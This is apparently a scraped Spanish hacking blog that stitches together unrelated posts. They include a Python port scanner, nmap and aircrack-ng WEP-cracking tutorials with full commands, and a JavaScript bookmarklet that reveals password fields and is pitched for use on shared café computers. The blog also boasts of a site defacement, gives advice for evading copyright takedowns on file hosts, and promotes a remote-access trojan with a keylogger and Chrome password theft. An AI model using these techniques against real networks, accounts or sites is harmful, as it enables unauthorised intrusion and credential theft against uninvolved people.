A principios de este mes escuchabamos la historia de un adolescente chino que estaba tan desesperado por conseguir un iPad 2 que decidió a vender un riñón para conseguirlo. El dinero que obtendría a cambio de su órgano era más que suficiente para cubrir el precio de este tablet y de unos cuantos productos más. Con lo que no contó este joven fué con algunas complicaciones después de la cirugía y sobre todo la ira de su madre cuando ella se dio cuenta de lo que había hecho….

Pues bien hoy os traemos otra noticia que no dejan indiferente y es que una joven china ofrece su virginidad al hombre que le compre un iPhone 4.

Sin duda de esta noticia hace que aprendamos dos cosas, que los Chinos están locos por los productos de Apple….y que la gente se vende muy barato…como mínimo podría haber esperado a que saliera el iPhone 5.

Fuente: http://www.geek.com/articles/apple/chinese-girl-offers-virginity-for-an-iphone-4-20110628/
Pues les dejo el code de mi Escaner de Puertos, nuevas funciones, algunos bugs... 
Pros:
Ahora se puede escanear un rango de puertos y puertos diferentes a la vez...
Contras:
Hay un Error al escanear el Puerto 80 cuando se escanean puertos diferentes a la vez...

AQUI EL CODE:
#!/usr/bin/python
#by [Z]tuX 2011 :D
import sys, socket, string
ver = '1.2'

if (len(sys.argv)==1) or sys.argv[1]=="-h" or sys.argv[1]=="--help":
print '''
Escaner de Puertos by [Z]tuX
[+] Uso: scanner.py [HOST] [OPCIONES] [PUERTO(s)]
-h Muestra la ayuda
-v Muestra la Version del Programa
========================================
OPCIONES
========================================
-p --ports Escanea diferentes puertos:
[+] Ejemplo: scanner.py www.example.com -p 21,26,22,445
[+] Ejemplo: scanner.py www.example.com --ports 21,26,22,445

-r --range Escanea un rango de puertos:
[+] Ejemplo: scanner.py www.example.com -r 21-30
[+] Ejemplo: scanner.py www.example.com --range 21-30
-
'''
elif (sys.argv[1]=='-v') or (sys.argv[1]=='--version'):
print 'Version ' + ver

#ESCANEO DE UN SOLO PUERTO
elif len(sys.argv)==3:
host = sys.argv[1]
port = int(sys.argv[2])
print '[+] Escaneando a %s al puerto %s ' % (host, port)
cn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cn.connect( (host, port) )
if port==80:
cn.send('GET / HTTP/1.1\r\n')
cn.send('HOST: %s\r\n\r\n'%host)
data = cn.recv(1024)
cn.close()
if data=='':
print "Puerto %s - [*] Cerrado :(" % port
else:
print "Puerto %s - [*] Abierto :D" % port
elif (cn.recv(1024) ==''):
print "Puerto %s - [*] Cerrado :(" % port
cn.close()
else:
cn.close()
print "Puerto %s - [*] Abierto :D" % port

#Escaneo por rangos
elif sys.argv[2]=='-r' and len(sys.argv)==4 or sys.argv[2]=='--range' and len(sys.argv)==4:
host = sys.argv[1]
ports = str(sys.argv[3])
print '[+] Escaneando a %s en un rango de puertos %s ' % (host, ports)
ztux = ports.split('-')
for puerto in range(int(ztux[0]), int(ztux[1]) +1):
cn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cn.connect( (host, puerto) )
if puerto==80:
cn.send('GET / HTTP/1.1\r\n')
cn.send('HOST: %s\r\n\r\n'%host)
data = cn.recv(1024)
cn.close()
if data=='':
print "Puerto %s - [*] Cerrado :(" % puerto
else:
print "Puerto %s - [*] Abierto :D" % puerto

elif (cn.recv(1024) ==''):
print "Puerto %s - [*] Cerrado :(" % puerto
cn.close()
else:
cn.close()
print "Puerto %s - [+] Abierto :D" % puerto

#Escaneo de diferentes puertos
elif sys.argv[2]=='-p' and len(sys.argv)==4 or sys.argv[2]=='--ports' and len(sys.argv)==4:
host = sys.argv[1]
ports = sys.argv[3]
print '[+] Escaneando a %s a los puertos %s ' % (host, ports)
ztux = ports.split(',')
for puerto in ztux:
cn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cn.connect( (host, int(puerto)) )
if puerto==80:
cn.send('GET / HTTP/1.1\r\n')
cn.send('HOST: %s\r\n\r\n'%host)
data = cn.recv(1024)
cn.close()
if data=='':
print "Puerto %s - [*] Cerrado :(" % puerto
else:
print "Puerto %s - [*] Abierto :D" % puerto

elif (cn.recv(1024) ==''):
print "Puerto %s - [*] Cerrado :(" % puerto
cn.close()
else:
cn.close()
print "Puerto %s - [+] Abierto :D" % puerto
else:
print u'\n>>> Teclea -h o --help para mas informaci\xf3n'
#[Z]TuX
#E[N]D


Comentarios o sugerencias a mi Mail xD
Hola...
Hace rato estaba viendo por la red que hay muchos escaners de puertos escritos en Python, pero me eh llevado la sorpresa de que marcan puertos abiertos cuando no lo son, y los que estan abiertos los marcan como cerrados WTF??
Probe con Nmap y pues nmap me marcaba puertos abiertos como el 21 por ejemplo y con los escaners que probe que vi por la red no me marcaba abierto el puerto.

Pues bien me di la tarea de jugar con Python un rato, y logre esto:

#!/usr/bin/python

import sys, socket
ver = '1.0'

if (len(sys.argv)==1) or sys.argv[1]=="-h" or sys.argv[1]=="--help":
print '''
Escaner de Puertos by [Z]tuX
[+] Uso: scanner.py [HOST] [PUERTO]
========================================
OPCIONES
========================================
-h Muestra la ayuda
-v Muestra la Version del Programa
VISITA: http://z0kw3r-syst3m.blogspot.com/
'''
elif (sys.argv[1]=='-v') or (sys.argv[1]=='--version'):
print 'Version ' + ver

#ESCANEO DE UN SOLO PUERTO
elif len(sys.argv)==3:
host = sys.argv[1]
port = int(sys.argv[2])
print '[+] Conectando a %s al puerto %s ' % (host, port)
cn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
cn.connect( (host, port) )
if (cn.recv(1024) ==''):
print "Puerto: %s Cerrado" % port
cn.close()
else:
cn.close()
print "Puerto %s Abierto" % port

else:
print 'Teclea -h para mas informacion'
#[E]nd
#[Z]tuX


Pues bien lo probe y este si me marca los puertos abiertos...
Por ejemplo:

C:\Python27>scanner.py secretuser8.site90.com 21
[+] Conectando a secretuser8.site90.com al puerto 21
Puerto 21 Abierto



SaludOS
Este code solo escanea un puerto a la vez por el momento, despues mejorare el code :D
[Z]tuX
Bien, el siguiente code nos ayudara a ver las claves que estan ocultas debajo de los asteriscos de las paginas web...
Este code es muy util si estamos en un CiberCafe o algo parecido y encontramos algo como esto:


Si colocamos esto en la barra de direcciones:
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Claves encontradas:\n\n" + s); else alert("No hay claves");})();

Podremos obtenes las claves debajo de los asteriscos


Eso es todo...
By [Z]tuX
Hace un poco de tiempo hice este y otros defaces, pero pues solo encontre esta captura que tenia por ahi guardada...



Actualmente la web se encuentra arreglada xD

Bien, pues continuando con operaciones matemáticas, en este artículo mostrare como usar una librería muy útil, la librería math.
Para usarla es tan sencillo como ir a la consola de Python y teclear:

>>> import math

Esta es la forma de importar librerias para usarlas en Python, Básicamente es: import Libreria

Después de esto, ahora si podremos hacer cálculos matemáticos tales como: sen(x), cos(x), etc…
Bien asi que para calcular el seno de un ángulo es tan sencillo como teclear:
>>> math.sin(90)
0.8939966636005579

Como podemos ver nos calcula el seno de 90. Lo mismo sería para cos(x) y para tan(x)
>>> math.sin(90)
0.8939966636005579
>>> math.cos(90)
-0.4480736161291701
>>> math.tan(90)
-1.995200412208242

Todos los valores anteriores están expresados en Radianes. Ahora bien, también podemos calcular la raíz cuadrada de un número, para ello usamos la función sqrt, que es algo como “Square root” que significa “raíz cuadrada”
Ahora calcularemos la raíz cuadrada de 81:
>>> math.sqrt(81)
9.0

Es tan sencillo como eso, al igual, si queremos el valor absoluto de un número, podemos usar la función fabs, ahora teclearemos:
>>> math.fabs(-9)
9.0
Nos devuelve el valor absoluto de un número.


Existen más funciones, como por ejemplo:
ceil(x) Redondeo hacia arriba de x (en inglés, ((ceiling)) significa techo).
floor(x) Redondeo hacia abajo de x (en inglés, ((floor)) significa suelo).
log(x)   Logaritmo natural (en base e) de x.
log10(x) Logaritmo decimal (en base 10) de x.
factorial(x) Nos regresa el factorial de un número.
copysign(x,y) Copia el signo de la variable y
pow(x,y) Eleva un número x a un exponente y
exp(x) El número e elevado a x.


>>> math.ceil(9.8)
10.0
>>> math.floor(9.8)
9.0
>>> log(19) #RECUERDEN COLOCAR math. ANTES SI NO NOS MARCARA ERROR

Traceback (most recent call last):
  File "<pyshell#9>", line 1, in <module>
    log(19)
NameError: name 'log' is not defined
>>> math.log(9)
2.1972245773362196
>>> math.log10(9)
0.9542425094393249
>>> math.factorial(5)
120
>>> math.copysign(-2,5)
2.0
>>> math.copysign(-3,10)
3.0
>>> math.pow(2,3)
8.0
>>> math.exp(5)
148.4131591025766


Para más funciones, recomiendo ir a: http://docs.python.org/library/math.html donde hay más ejemplos y mas funciones.

By [Z]tuX
Hola a todos...
Hoy presento la version 2.5 de mi encriptador de palabras....
Eh agregado nuevas funciones y eh arreglado algunos bugs que tenia...
Pues aqui el code :D

#!/usr/bin/python
# -*- coding:UTF-8 -*-
import sys, base64, hashlib, hmac
from string import maketrans

#Codificacion con maketrans
ZtuX=maketrans("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789","mab1c2z3k4h5f6s7p8i9y0rewqQW]RT[UI$%A(D-G)JK Z#CVB/M@&\*.;_^{}")
#Decodificación con makeTrans
Ztux=maketrans("mab1c2z3k4h5f6s7p8i9y0rewqQW]RT[UI$%A(D-G)JK Z#CVB/M@&\*.;_^{}","abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")

def _md5(palabra):
return hashlib.md5(palabra).hexdigest()
def code_base64(palabra):
return base64.b64encode(palabra)
def decode_base64(palabra):
return base64.b64decode(palabra)
def ztux(palabra):
return palabra.translate(ZtuX)
def dztux(palabra):
return palabra.translate(Ztux)
def sha1(palabra):
return hashlib.sha1(palabra).hexdigest()
def sha256(palabra):
return hashlib.sha256(palabra).hexdigest()
def sha384(palabra):
return hashlib.sha384(palabra).hexdigest()
def sha512(palabra):
return hashlib.sha512(palabra).hexdigest()
def Hmac(palabra):
return hmac.new(palabra).hexdigest()
def no_vocales(palabra):
resultado=''
for i in palabra:
if i != "a":
if i != "e":
if i != "i":
if i != "o":
if i != "u":
resultado = resultado + i
return resultado
def run():
ver='2.5'
if (len(sys.argv)==1) or sys.argv[1]=="-h" or sys.argv[1]=="--help":
print """
==============================================
ZtuX
==============================================
Visita: http://z0kw3r-syst3m.blogspot.com/
==============================================
>>>Modo de uso: cript.py [Palabra] [Hash]
>>>Ejemplo: cript.py Encriptar_esto -md5

-h Muestra esto en pantalla
-v Muestra la Version del Programa
-o Muestra otras funciones

-md5 Codifica en MD5
-base64 Codifica en base64
-dbase64 Decodifica en base64
-sha Codifica en sha1
-sha256 Codifica en sha256
-sha384 Codifica en sha384
-sha512 Codifica en sha512
-hmac Codifica en hmac
"""
elif sys.argv[1]=='-o' or sys.argv[1]=='--others':
print '''
==============================================
OTROS
==============================================
-novoc Elimina las vocales de una palabra
-ztux Codifica en ZtuX
-dztux Decodifica ZtuX
'''

elif sys.argv[1]=='-v' or sys.argv[1]=='--version':
print "Cript version: " + ver + "\nAutor: ZtuX"
elif (len(sys.argv)>3):
print "ERROR...\nModo de uso: cript.py [Palabra] [Hash]"
elif sys.argv[2]=='-md5' or sys.argv[2]=='-MD5':
palabra=sys.argv[1]
print 'Texto Codificado: %s'%_md5(palabra)
elif sys.argv[2]=='-base64' or sys.argv[2]=='-BASE64':
palabra=sys.argv[1]
print 'Texto Codificado: %s'%code_base64(palabra)
elif sys.argv[2]=='-dbase64' or sys.argv[2]=='-DBASE64':
palabra=sys.argv[1]
print 'Texto Decodificado: %s'%decode_base64(palabra)
elif sys.argv[2]=='-ztux' or sys.argv[2]=='-ZTUX':
palabra=sys.argv[1]
print 'Texto Codificado: %s'%ztux(palabra)
elif sys.argv[2]=='-dztux' or sys.argv[2]=='-DZTUX':
palabra=sys.argv[1]
print 'Texto Decodificado: %s'%dztux(palabra)
elif sys.argv[2]=='-sha' or sys.argv[2]=='-SHA':
palabra=sys.argv[1]
print 'Texto Codificado: %s'%sha1(palabra)
elif sys.argv[2]=='-sha256' or sys.argv[2]=='-SHA256':
palabra=sys.argv[1]
print 'Texto Codificado: %s'%sha256(palabra)
elif sys.argv[2]=='-sha384'or sys.argv[2]=='-SHA384':
palabra=sys.argv[1]
print 'Texto Codificado: %s'%sha384(palabra)
elif sys.argv[2]=='-sha512' or sys.argv[2]=='-SHA512':
palabra=sys.argv[1]
print 'Texto Codificado: %s'%sha512(palabra)
elif sys.argv[2]=='-hmac' or sys.argv[2]=='-HMAC':
palabra=sys.argv[1]
print 'Texto Codificado: %s'%Hmac(palabra)
elif sys.argv[2]=='-novoc' or sys.argv[2]=='-NOVOC':
palabra=sys.argv[1]
print 'Texto Sin Vocales: %s'%no_vocales(palabra)
else:
print 'Debes indicar Frase y hash a encriptar...'
print 'Para mas informacion teclea -h o --help o -ayuda'

run()

#[E]nD
#[Z]tuX


VISTA PREVIA DE COMO LUCE:

NOTAS:
En el codigo cambien las lineas 6,7,8,9 por esto
#Codificacion con maketrans
ZtuX=maketrans("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789","mab1c2z3k4h5f6s7p8i9y0rewqQW]RT[UI$%A(D-G)JK<Z#CVB/M@&\*.;_^{}")
#Decodificación con makeTrans
Ztux=maketrans("mab1c2z3k4h5f6s7p8i9y0rewqQW]RT[UI$%A(D-G)JK<Z#CVB/M@&\*.;_^{}","abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")

LA RAZON:
Es porque aquí blogger me detecta un "error de tags", piensa que agrego html, pero no jaja...
SaludOS...
En este video veremos como traducir totalmente a cualquier idioma el Smf 2.0 en este particular caso lo traduciremos al español. Saludos!

Bueno en este tutorial aprenderan a instalar de manera facil y sencilla un foro smf en un servidor local, para subirlo a un hosting o server publico que este a la disposición de todos, es lo mismo, solo basta con que acepte php/mysql luego deberan subir los archivos y los pasos son los mismos.

Sino tienen un servidor local y no saben como instalarlo, aca un tutorial:
http://mundohacking.com/index.php?topic=207.0



By Xpl0_syst3m
Bueno, este es un paper hecho por Progresive Death donde explica como usar las Tools SSH Bruteforcer que se encuentra en backtrack4, Escaneo y Ataque de Fuerza Bruta hacia SSH, para poder establecer la conexión con la sesión SSH que hemos conseguido. Aquí el paper:

Brute Ssh

Autor: Progresive Death
Fuente: http://charsecurity.blogspot.com/
Mozilla lanza la nueva versión de su navegador, que incluye mejoras de rendimiento y de soporte para estándares como el HTML5 y en la función para impedir el rastreo.

Han pasado poco más de tres meses desde que Firefox 4 saltó a la Red, pero ya está aquí su sucesor, Firefox 5, que aspira a, al menos, igualar los 200 millones de descargas que logró su antecesor. Como siempre, está disponible en la web de Mozilla para Windows, Mac y Linux y en el Android Market para Android.

Mozilla ya anunció hace un tiempo que a partir de ahora entrarían en un "ciclo de desarrollo más rápido", es decir, que se acortaría la distancia temporal entre una y otra versión, lo que sin duda, más allá de las molestias ocasionales que puede causar cualquier actualización, mejorará la experiencia del usuario y la seguridad y estabilidad del navegador. 


La última versión de Firefox incluye, según asegura la organización en su web, más de 1.000 mejoras, entre ellas "soporte a más tecnologías web de última generación" para facilitar a los desarrolladores la creación de complementos, y añade a su versión para Android la función de privacidad No rastrear. Mozilla desarrolló en sus versiones de escritorio dicha función para evitar que la navegación de los usuarios sea seguida si no se desea y para controlar cómo se usa esa información. Ahora se mejora dicha función y además se añade al móvil.

Las versiones de Firefox para Windows, Mac y Linux ahora soportan el estándar CSS Animations, se han revisado los sistemas de carga de WebGL, hay mejoras en JavaScript, canvas, consumo de memoria y rendimiento de red y en el soporte a los estándares HTML5, XHR, MathML y SMIL, entre otros cambios.

Source
Bueno aqui dejo este tuto para los que son ubunteros...

Bueno lo principal es instalarse Aircrack-ng y este se encuentra en los repositorios de ubuntu asi que solo lanzamos el siguiente comando en la terminal:
sudo apt-get install aircrack-ng

Antes que nada deben saber que no con todas las tarjetas wi-fi se puede usar el modo monitor, yo usare para este tutorial lo siguiente:

Notebook Toshiba NB255
Tarjeta wireless Atheros AR9285
S.O. Ubuntu Lucid Lynx
Airckrack-ng

Ok. Manos ala obra, una vez instalado aricrack-ng abrimos una terminal y ejecutamos el siguiente comando:
sudo su

Esto para tener permisos de super usuario y poder ejecutar todos los comandos sin ningun problema. Ahora ponemos nuestra tarjeta en modo monitor con el siguiente comando:
airmon-ng start wlan0

Si nuestra tarjeta se pone en modo monitor nos mandara el mensaje de que nuestra tarjeta se encuentra en modo monitor en mon0 (o dependiendo tu tarjeta), y se vera como muestra la siguiente:



Ahora escaneamos las redes que hay a nuestro alcance con el siguiente comando:
airodump-ng mon0

mon0 es la interfaz que se activo en modo monitor anteriormente y airodump-ng es un de las monerias de aircrack-ng para la captura de datos y especialmente para la captura de IVs o vectores iniciales


En este caso aquí en mi cuarto solo detecta mi router como ven es el INFINITUM0421 que obviamente es del proveedor TELMEX de aqui de México Sonreir, y aqui tomamos lapiz y papel Sonrisa y apuntamos lo siguiente:

BSSID
ESSID
CH


BSSID: Basic Service Set IDentifier, es el identificador del punto de acceso al que nos debemos asociar para poder compartir paquetes.
ESSID: Extended Service Set IDentifier, es el nombre de la red o punto de acceso.
CH: Este es el canal en el que trabaja el dispositivo wireless al que accederemos, el estandar IEEE define una separación mínima entre canales de 5 Mhz, por lo que, empezando de 2.412 Ghz. tendremos que :

Canal 01: 2.412 Ghz
Canal 02: 2.417 Ghz.
Canal 03: 2.422 Ghz.
Canal 04: 2.427 Ghz.
Canal 05: 2.432 Ghz.
Canal 06: 2.437 Ghz.
Canal 07: 2.442 Ghz.
Canal 08: 2.447 Ghz.
Canal 09: 2.452 Ghz.
Canal 10: 2.457 Ghz.
Canal 11: 2.462 Ghz.
Canal 12: 2.467 Ghz.
Canal 13: 2.472 Ghz.
Canal 14: 2.484 Ghz.

Una vez que copiamos los datos presionamos ctrl+c para parar el escaneo y ejecutamos el siguiente comando:
airodump-ng -c 1 -w Paquete mon0

Bueno paso a explicar el comando airodump-ng como ya mencione es una de las monerías de aircrack-ng para captura de datos, el -c 1 es la instrucción que ase que escuche específicamente en el canal 1 y -w Paquete es la instrucción para que escriba los paquetes de información escuchados en el canal 1 independientemente de la red ala que estemos asiendo la auditoria en el archivo Paquete o como lo quieran llamar, se vera algo como la siguiente imagen:


A terminal la dejan trabajando en lo suyo y abrimos otra y ejecutamos de nuevo el comando sudo su para obtener permisos de super usuario, ahora ejecutamos el siguiente comando:
ifconfig

Nos aparecerá información detallada de nuestra tarjeta de red aquí copiamos nuestra MAC adress que ocuparemos mas adelante, se vera algo asi como esto:


La MAC adress es la que esta subrayada de blanco en la imagen, ahora ejecutamos el siguiente comando:
ifconfig mon0 up

En este momento utilizaremos los datos que anteriormente copiamos que son:
BSSID
ESSID
MAC Adress

Aremos uso de otra monería de la suite Aircrack-ng que es Aireplay-ng que principalmente se usa para la inyección de frames y se pueden usar los siguientes tipos de ataques:

Ataque 0: Desautenticación
Ataque 1: Autenticación falsa
Ataque 2: Selección interactiva del paquete a enviar
Ataque 3: Reinyección de petición ARP
Ataque 4: El "chopchop" de KoreK (predicción de CRC)

nosotros usaremos el 1 de autenticación falsa y lanzaremos el siguiente comando en la terminal:
aireplay-ng -1 0 -a 00:1F:B3:82:2A:F1 -h E8:39:DF:A0:47:F7 -e INFINITUM0421 mon0

Este comando lo que ase es mandar peticiones al dispositivo autenticarnos y asociarnos al mismo el -a 00:1F:B3:82:2A:F1 es el BSSID al que se le mandaran las peticiones, -h E8:39:DF:A0:47:F7 es la mac que se asociara al dispositivo (por seguridad pueden cambiar su MAC Adress con MACchanger que tambien se encuentra en los repositorios de ubuntu) y por ultimo el -e INFINITUM0421 es el ESSID al que nos asociaremos, si todo va bien saldra algo como esto:


Una vez que estamos asociados ala red ejecutamos el siguiente comando:
aireplay-ng -3 -b 00:1F:B3:82:2A:F1 -h E8:39:DF:A0:47:F7 mon0

Este comando es para el envío de peticiones ARP y generar mas trafico en la red para que así podamos capturar mas datos en el archivo "Paquete" que anteriormente creamos, una vez que ejecutemos este comando se empesaran a enviar las peticiones y rapidamente veremos como aumenta el #DATA en la ventana que dejamos abierta para la captura de paquetes, una vez que llegue a 20,000 ejecutamos el siguiente comando:
aircrack-ng -z Paquete-01.cap

Este comando es para desencriptar la calve WEP y despues de 1 0 2 minutos nos mostrara el mensaje KEY FOUND junto con la clave WEP en este caso 05:82:96:02:07 como se muestra en la imagen:


Para conectarnos a la red solo eliminamos los dos puntos ( : ), copiamos y pegamos y listo!!!  Gui&ntilde;ar

Como ven no es muy dificil crackear un clave WEP solo me tomo 13 minutos todo el proceso aunque se puede hacer en mucho menos tiempo
Source
Hola, que tal...
En este pequeño "manual" tratare de explicar el uso básico de esta herramienrta: nmap

¿Que es nmap?
Básicamente nmap es una herramienta con la que podemos escanear redes grandes o pequeñas y poder determinar los equipos activos y los servicios de los mismos.

Conceptos básicos:
¿Que es un puerto?:
Un puerto es una zona en la que dos ordenadores (hosts) intercambian información
¿Que es un servicio?:
Un servicio es el tipo de información que se intercambia con una utilidad determinada como ssh o telnet.
¿Que es un Firewall?:
Un firewall acepta o no el trafico entrante o saliente de un ordenador.
¿Que son paquetes SYN?:

Así por encima, pueden ser paquetes que abren un intento de establecer una conexión TCP.

Como instalar nmap[?]
Es tan sencillo como ir en una terminal y teclear:
sudo apt-get install nmap
Esto para sistemas Operativos Debian y derivados del mismo [Ubuntu, Linux Mint, etc..]
En S.O como Windows puedes ir a la pagina de Nmap y vas a la seccion de descargas, lo bajas y lo instalas.



Escaneo basico

$ nmap [Tipos(s)de escaneo] [Opciones] <servidor o red>

Pues bien, llegó la hora de hacer nuestro primer uso de esta tool, primero vamos a una terminal o al simbolo del sistema, nos logeamos como root [o admin] segun su S.O y tecleamos:
nmap localhost
En concreto empezara a trabajar nmap...
Bien con nmap estamos llamando al programa, localhost es el equipo que deseamos escanear...


Para escanear un rango determinado de puertos para una ip lo haremos de la siguiente manera. Opción -p
nmap -p 1-80 localhost

Como podemos ver, en mi caso no me detecto ningun puerto abierto...
Tambien podemos pedir que nmap nos haga un escaneo de diferentes puertos, por ejemplo:
nmap -p 1,22,23,30 localhost


Y como podemos ver, me muestra que el puerto 1 esta cerrado, al igual que el puerto, 22,23, y el 30 esta abierto [ya que abri el puerto con netcat]
Bien, ahora estamos en una red de la cual queremos saber que computadoras tienen, por ejemplo el puerto 445 abierto,lo podemos hacer asi:
nmap -p 445 192.168.1.2-254

Podemos usar la opción -P0, puede servirnos si lo que queremos es que no intente hacer ping a un servidor antes de escanearlo, es muy útil para maquinas que tienen firewall o no responden a ping.
nmap -P0 192.168.1.65

Tambien, podemos hacer un escaneo a una maquina haciendo Ping, con la opcion -sP
nmap -sP 192.168.1.65

Podemos tambien escanear algun puerto y ver la version del servicio que corre, para esto usamos la opcion -sV, por ejemplo, queremos ver que version de FTP corre alguna maquina:
nmap -sV -p 21 192.168.1.65




Otra opcion interesante es la flag -O , que nos permite saber que S.O esta corriendo el host que estamos escaneando, su uso es algo como:
nmap -O 192.168.1.65



También podemos hacer un escaneo ya sea a una alta velocidad o una baja velocidad para no ser detectados, esto lo podemos hacer mediante la opcion -T seguidamente de un numero dentro del rango 0-5.
Las opciones anteriores van de la menor velocidad [0] a la mayor velocidad [5] de escaneo. Por ejemplo podemos hacer:
nmap -T 5 192.168.1.65



OTRAS OPCIONES:

[-sS] Escaneo TCP SYN se envían paquetes SYN, denominada como escaneo medio abierto porque envía paquetes como si se fuese a abrir una conexión.
Debemos ser root para poder usar esta opción.

[Opciones -sF -sX -sN] Modos Stealth FIN, Xmas Tree o Nul scan respectivamente. Con estos modos seremos muy pero muy clandestinos, asi que si nos encontramos con un filtro o algun firewall que no nos dejen enviar paquetes SYN a determinado[s] puerto[s] podemos usar alguna de estas opciones.
Debemos ser root para poder usar estas opciones.

[-v] El Famoso verbose: Nos muestra informacion mas amplia de nustro escaneo
[-h] Muestra la ayuda de nmap

By [Z]tuX
Cuando varias personas suben un mismo archivo (IDENTICO SIN IMPORTAR EL NOMBRE SINO SU CONTENIDO) a un hosting gratuito como Megaupload, Rapidshare, Hotfile, o cualquier otro hosting, ellos identifican que son iguales, idénticos, y guardan una sola copia para todos, miles de enlaces apuntan entonces a un sólo archivo, pues al final los enlaces son diferentes pero el archivo ellos saben que es el mismo…

¿Y como saben que 2 archivos son idénticos si yo le cambio el nombre?

Porque realizan un proceso llamado checksum, que toma los datos internos del archivo (bits) y realizando una operación matemática que no viene al caso explicar, consiguen un número único que se llama checksum.

NO HAY 2 CHECKSUM DIFERENTES PARA ARCHIVOS QUE SON IDENTICOS, SI UNO TIENE ALGO DIFERENTE YA NO ES EL MISMO ARCHIVO.
(El nombre repito no importa, sino el contenido, su interior que es lo que usan para hacer el cálculo)

¿Y porque esto me afecta?

Porque cuando muchas personas suben un material IDENTICO, aunque lo hagan con diferente nombre, desde diferentes países, con diferentes usuarios y en diferentes momentos, ellos (las empresas de hosting como Megaupload Rapidshare, etc) guardan una sola copia del archivo (pues es IDENTICO!!!).

Para ellos se trata de una sola copia del archivo y de hecho lo es, no hay 2 archivos que tengan la misma información que den un checksum diferente o distinto.

ENTONCES TODOS LOS LINKS DE DESCARGA DE MILES DE PERSONAS QUE SUBAN EL MISMO ARCHIVO APUNTARAN A UN UNICO ARCHIVO!!!!

¿Y porque me afecta?

Porque si alguien denuncia uno de esos miles de links o enlaces de descarga, automáticamente las empresas de hosting gratuito borrarán ese archivo único guardado, y entonces deja de estar disponible no sólo para el enlace que ha sido denunciado sino para los otros miles de links o enlaces que apuntan al mismo contenido!!!

Así con una sola denuncia aveces caen miles de enlaces, TODO PORQUE EL ARCHIVO ERA IDENTICO POR DENTRO Y EL CHECKSUM ERA EL MISMO!!!!!

IMPORTANTE!!!!
Cuando se denuncia un material el archivo único guardado se borra, y así miles de enlaces dejan de poder acceder a ese material!!!
Cuando se denuncia un material, el checksum queda guardado, así si otro quiere subir el mismo material idéntico no le permitirá hacerlo.

¿Y como podemos evitar que esto pase?


1) Arma archivos .zip o .rar diferentes al que has bajado!!!

Cuando compartes un archivo que has bajado de alguna parte, es decir cuando descargas un archivo y luego lo quieres subir para volver a compartirlo con tu propio enlace, lo que puedes hacer es armar un archivo .zip o .rar nuevo con contenido extra, metes dentro algunas fotos de cualquier cosa, o algún archivo de texto con algún texto largo, de esta manera el checksum cambiará y para el hosting de archivos tu archivos será UNICO, y no estará asociado a otros pues no es igual a ninguno!!!!
Así, si te denuncian a ti no caerán los enlaces de otras personas, y lo que es más importante, si denuncian los enlaces de esa otra persona de donde copiaste el contenido, NO TE CAERAN TUS ENLACES O LINKS!!!!

2) Parte en pedazos diferentes y no iguales,y subelo por partes de diferente tamaño!!!

Si has bajado un archivo, utiliza herramientas para cortarlo en partes (como el winrar, hjsplit y otros…) y genera partes que no hayas usado aún, diferentes tamaños para cada parte y así generar diferentes archivos que no sean iguales a otros….

De todas maneras esta es una solución menos buena que poner dentro del rar o zip un archivo de texto propio tuyo, o algunas imagenes aleatorias para marear al robot que calcula el checksum de los archivos finales.

3) Poner nombres no relacionados con el material e imposibles de buscar o entender!!!

Si bien el nombre del archivo no influye para el checksum, SI INFLUYE A LA HORA DE QUE LOS DENUNCIADORES SEPAN LO QUE TIENE EL ARCHIVO DENTRO, hay servidores gratuitos que permiten buscar archivos por su nombre, entonces si pones “NombredelMaterial” y quien denuncia está buscando ese mismo nombre, lo encontrará fácil y te denunciará el material!!! Podría pensarse que se obtienen más descargas, pero al final lo que obtienes son más denuncias!!!!

Siempre, siempre, siempre usa nombres imposibles de entender y que no contengan el nombre del material que va dentro, no hace falta pues la comunidad se encargará de que todos sepan que tiene dentro, y como puedes ver si pones un nombre de archivo asociado al material que va dentro, estás facilitando que te denuncien el archivo!!!!

4) Si subes el mismo archivo a muchas páginas y repites la subida del archivo cuando se cae, hazlo siempre usando el punto 1) y 2) de este mini tutorial para que tus archivos sean siempre siempre siempre diferentes diferentes diferentes!!!!

Cuanto más apliques lo que lees en este mini tutoríal más dificil será que tus enlaces puedan caer, y además estaremos luchando contra la tiranía de los que denuncian los archivos de forma masiva y juegan con este problema de las empresas de hosting!!!



Source
Hola Amigos...
Este pequeño script, muestra imagenes aleatorias...

Eh aqui el code xD:

<?php

// selecion de todas las imagenes a mostrar
$imagen[0]='imagen1.jpg';
$imagen[1]='imagen2.jpg';
$imagen[2]='imagen3.jpg';
$imagen[3]='imagen4.jpg';
$imagen[4]='imagen5.jpg';
$imagen[5]='imagen6.jpg';
$imagen[6]='imagen7.jpg';

//iniciar amostrar aleatoriaente los numeros de el inicio al final
$i=rand(0,6);

/* Mostramos la imagen aleatoria */

print '<img src="'.$imagen[$i].'">';
?>
Aca les dejo la ultima version de este gran RAT, y uno de sus mejores updates es el Capturador de Password's ( Este captura las de Chrome)



Aquí algunos cambios desde la última versión: Por favor, actualice sus servidores. - Se ha corregido un error en el administrador de archivos con "correr con params".
- Corregido el error cuando la función de keylogger abierto.
- Se ha añadido otra opción de la inyección.
- Añadida la opción para seleccionar la captura de audio de forma automática.
- Se ha añadido nuevas carpetas especiales en el administrador de archivos.
- Corregido un error icono de la bandeja.
- Se ha añadido la función de actualización automática.
- Se ha añadido una opción para bloquear las conexiones de la lista de IP.
- Corregido problema de las banderas.
- Se ha corregido contraseñas de Goggle Chrome.
- Se ha corregido un error el uso de archivos de descarga en el gestor de ficheros.
- Se ha añadido un botón en el administrador de archivos para actualizar las unidades y la lista de conexiones de red.
- Alta en el administrador de archivos de una función nueva vista previa en miniatura.
- Se ha añadido la columna de uso de CPU en el Administrador de proceso.
- Se ha añadido archivos de masas de búsqueda.
- Se ha añadido una opción para abrir el directorio del proceso seleccionado en el gestor de procesos.
- Se ha añadido una opción divertida en gestor de ventanas: La ventana de Crazy.
